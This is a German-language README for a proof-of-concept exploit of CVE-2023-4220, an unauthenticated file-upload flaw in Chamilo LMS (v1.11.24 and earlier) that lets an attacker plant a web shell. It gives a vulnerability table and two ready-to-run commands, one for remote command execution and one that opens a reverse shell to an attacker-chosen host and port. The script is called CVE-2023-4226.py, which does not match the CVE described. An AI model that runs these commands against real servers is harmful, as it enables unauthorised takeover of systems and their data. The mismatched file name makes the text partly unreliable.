
POC für CVE-2023-4220 - Chamilo LMS Unauthenticated Big Upload File Remote Code Execution
Mehr zu CVE-2023-4220: StarLabs Advisory
| Produkt | Chamilo |
|---|---|
| Anbieter | Chamilo |
| Schweregrad | Hoch – Angreifer können Software-Schwachstellen ausnutzen, um eine nicht authentifizierte Remote-Codeausführung zu erlangen. |
| Betroffene Versionen | <= v1.11.24 |
| Getestete Versionen | v1.11.24 (zum Zeitpunkt der Erstellung aktuellste Version) |
| CVE-Kennung | CVE-2023-4220 |
| CVE-Beschreibung | Uneingeschränkter Dateiupload in der Funktion zum Hochladen großer Dateien in /main/inc/lib/javascript/bigupload/inc/bigUpload.php in Chamilo LMS <= v1.11.24 ermöglicht nicht authentifizierten Angreifern, gespeicherte Cross-Site-Scripting-Angriffe durchzuführen und durch das Hochladen einer Web-Shell eine Remote-Codeausführung zu erlangen. |
| CWE-Klassifikation | CWE-434: Uneingeschränkter Upload einer Datei mit gefährlichem Typ |
| CAPEC-Klassifikation | CAPEC-650: Hochladen einer Web-Shell auf einen Webserver |
Um Befehle direkt auszuführen, verwenden Sie den folgenden Befehl:
python CVE-2023-4226.py -u http://<target_ip>:<target_port> -c whoami
Um eine Reverse-Shell zu erhalten, verwenden Sie den folgenden Befehl:
python CVE-2023-4226.py -u http://<target_ip>:<target_port> -lhost <local_ip> -lport <local_port>